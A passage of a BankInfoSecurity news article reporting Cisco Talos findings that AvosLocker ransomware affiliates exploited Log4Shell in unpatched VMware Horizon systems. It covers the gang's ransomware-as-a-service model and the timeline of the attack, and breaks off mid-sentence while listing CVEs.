Ransomware Gang Uses Log4Shell – BankInfoSecurity

Fraud Management & Cybercrime

AvosLocker Makes Use of Unpatched VMWare Virtual Desktop Software

Ransomware Gang Uses Log4Shell

Log4Shell is the vulnerability that keeps giving with yet another ransomware group at work exploiting a bug present in a ubiquitous open-source data-logging framework.

See Also: Fireside Chat | Zero Tolerance: Controlling The Landscape Where You’ll Meet Your Adversaries

Analysis by Cisco Talos shows actors affiliated with ransomware-as-a-service group AvosLocker exploiting unpatched VMWare virtual desktop software containing the vulnerability.

The Apache Software Foundation in December set off a global race between systems administrators and hackers when it fixed a bug identified by security researchers in the Java-based Log4j logging utility. Despite a flurry of warnings, some systems remain open hackers exploiting unpatched systems.

A study of a campaign involving Avos ransomware showed hackers managed to gain access to an unidentified organization via a pair of VMWare Horizon applications (see: Log4Shell Update: VMware Horizon Targeted).

Attack Analysis

AvosLocker has been active since 2021 and follows a RaaS model – its operators handle negotiation and extortion practices for affiliates.

Typically, Avos actors use spam email campaigns as an initial infection vector to deploy ransomware. But in this case, Cisco Talos discovered that the they leveraged an exposed ESXi server on the internet over VMWare Horizon Unified Access Gateway that was vulnerable to Log4Shell.

The customer, whose network was attacked, notified Talos on March 7. But the researchers at Talos observed activity ranging back to Feb. 7, and found four vulnerabilities associated with Log4Shell – CVE-2021-44228, CVE-2021-45046,